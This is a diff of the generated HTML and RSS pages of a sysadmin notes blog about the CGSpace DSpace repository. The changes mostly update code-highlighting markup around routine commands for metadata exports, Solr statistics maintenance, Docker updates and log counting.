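<p>From memory the invocation looked roughly like the sketch below; the Atmire class path and the <code>-t</code> flag (hours per batch) are assumptions here, so verify against the Atmire documentation before reusing it:</p>
<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
</code></pre>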

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -109,11 +109,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
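<p>Under the hood the script essentially issues one Solr delete-by-query per agent pattern. A minimal sketch of that mechanism, assuming the statistics core at localhost:8081 (the real script also escapes the patterns and loops over the yearly cores):</p>
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;userAgent:/MaCoCu.*/&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre>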
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
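<p>The exported JSON can then be loaded into a new yearly core with the same solr-import-export-json tool. A sketch, assuming a <code>statistics-2019</code> core has already been created and that the import action mirrors the export:</p>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</code></pre>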
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -238,15 +238,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
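<p>The inverse filter gives the affiliations that still need manual review or mapping, using the same csvkit tools (the output filename is just an example):</p>
<pre tabindex="0"><code>$ csvgrep -c matched -m false /tmp/2021-10-01-affiliations-matching.csv &gt; /tmp/2021-10-01-affiliations-unmatched.csv
</code></pre>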
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
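<p>As an aside, the same image list can be produced without the <code>sed</code> gymnastics by using Docker&rsquo;s built-in Go templating, which is less brittle if the column layout of <code>docker images</code> ever changes:</p>
<pre tabindex="0"><code># docker images --format &#39;{{.Repository}}:{{.Tag}}&#39; | grep -v &#39;&lt;none&gt;&#39; | xargs -L1 docker pull
</code></pre>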
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
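<p>A quick sanity check that the export matches what <code>\COPY</code> reported (csvkit&rsquo;s <code>csvstat --count</code> prints the row count excluding the header):</p>
<pre tabindex="0"><code>$ csvstat --count /tmp/2021-07-01-all-subjects.csv
</code></pre>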
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

View File

@ -17,11 +17,11 @@
&lt;ul&gt;
&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics
&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -101,15 +101,15 @@ $ zstd statistics-2019.json
&lt;ul&gt;
&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -271,17 +271,17 @@ COPY 20994
&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
{
&amp;#34;count&amp;#34; : 100875,
&amp;#34;_shards&amp;#34; : {
&amp;#34;total&amp;#34; : 1,
&amp;#34;successful&amp;#34; : 1,
&amp;#34;skipped&amp;#34; : 0,
&amp;#34;failed&amp;#34; : 0
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;count&amp;#34; : 100875,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;_shards&amp;#34; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;total&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;successful&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;skipped&amp;#34; : 0,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;failed&amp;#34; : 0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -599,17 +599,17 @@ COPY 20994
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
